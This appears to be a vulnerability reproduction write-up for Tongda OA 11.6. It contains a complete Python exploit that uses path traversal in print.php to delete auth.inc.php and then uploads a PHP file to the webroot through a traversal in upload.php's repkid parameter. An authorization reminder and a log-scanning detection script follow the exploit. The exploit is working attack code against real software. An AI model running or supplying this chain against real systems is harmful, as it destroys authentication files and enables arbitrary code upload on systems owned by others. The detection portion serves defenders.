Installation
Download the Tongda OA installation package and install it.
Download link:
Link: https://pan.baidu.com/s/1tSuxT3N2zdEPwGH07-pmRw Password: t9s3
After the installation finishes, the page opens automatically.
Exploitation
# _*_ coding: utf-8 _*_
# author: return0;
import requests

target = "http://10.211.55.5"
payload = "<?php echo HelloWorld ?>"

print("[*] Warning: this exploit code will DELETE auth.inc.php, which may damage the OA")
input("Press enter to continue")

# Step 1: delete auth.inc.php through the path traversal in print.php
print("[*] Deleting auth.inc.php....")
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)

# Step 2: confirm the file is gone (the web server now reports it as missing)
print("[*] Checking if file deleted...")
url = target + "/inc/auth.inc.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-] Failed to delete auth.inc.php")
    exit(-1)
print("[+] Successfully deleted auth.inc.php!")

# Step 3: upload the payload; repkid carries the traversal sequence
print("[*] Uploading payload...")
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url, files=files)

# Step 4: check whether the uploaded file is reachable
url = target + "/_hack.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+] File uploaded successfully")
    print("[+] URL:", url)
else:
    print("[-] Failed to upload file")
Then run this code.
Open the link in a browser and the reproduction succeeds. When this vulnerability is verified during an actual security-service penetration test, the customer must be told to make a backup first. Security-service engineers do not need to delete the auth.inc.php file during verification: writing a script that confirms the file exists and that the OA version is 11.6 is enough to prove the vulnerability is present. The Internet is not a lawless place; penetration testing must only be carried out with the customer's full authorization and after the customer has been informed of the risks.
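For the defending side, the two request shapes used above (the traversal in the print.php guid parameter and the upload.php call whose repkid carries the "<>"-padded traversal) are easy to spot in web server access logs. The following is an added detection example, not part of the original write-up; the log lines are constructed combined-format entries and the endpoint paths are the ones quoted in the exploit.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Plain "../" and the ".<>./" form that survives a naive "<>" strip.
TRAVERSAL = re.compile(r"(\.\./|\.<>\./)")

# Combined log format: ip ident user [time] "METHOD uri HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(uri):
    """Return a finding label for one request URI, or None if it looks benign."""
    parts = urlsplit(uri)
    path = unquote(parts.path).lower()
    qs = parse_qs(parts.query)  # percent-decodes values, so %2e%2e%2f is caught too
    if path.endswith("/module/appbuilder/assets/print.php"):
        if TRAVERSAL.search(qs.get("guid", [""])[0]):
            return "file-delete attempt: print.php guid traversal"
    if path.endswith("/general/data_center/utils/upload.php"):
        if qs.get("action", [""])[0] == "upload" and TRAVERSAL.search(qs.get("repkid", [""])[0]):
            return "upload attempt: upload.php repkid traversal"
    return None


def scan_log(lines):
    """Yield (ip, method, label, status) for every log line matching a pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        label = classify_request(m.group("uri"))
        if label:
            findings.append((m.group("ip"), m.group("method"), label, m.group("status")))
    return findings


# Constructed sample log: three lines from the exploit flow, two benign lines.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Oct/2020:12:00:01 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 12 "-" "python-requests/2.24"',
    '10.0.0.7 - - [10/Oct/2020:12:00:02 +0800] "GET /inc/auth.inc.php HTTP/1.1" 404 38 "-" "python-requests/2.24"',
    '10.0.0.7 - - [10/Oct/2020:12:00:03 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./ HTTP/1.1" 200 0 "-" "python-requests/2.24"',
    '10.0.0.9 - - [10/Oct/2020:12:00:04 +0800] "GET /module/appbuilder/assets/print.php?guid=abc123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2020:12:00:05 +0800] "GET /general/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 404 on /inc/auth.inc.php immediately after a flagged print.php request is the confirmation a responder should look for, since it means the deletion succeeded and the backup mentioned above is needed.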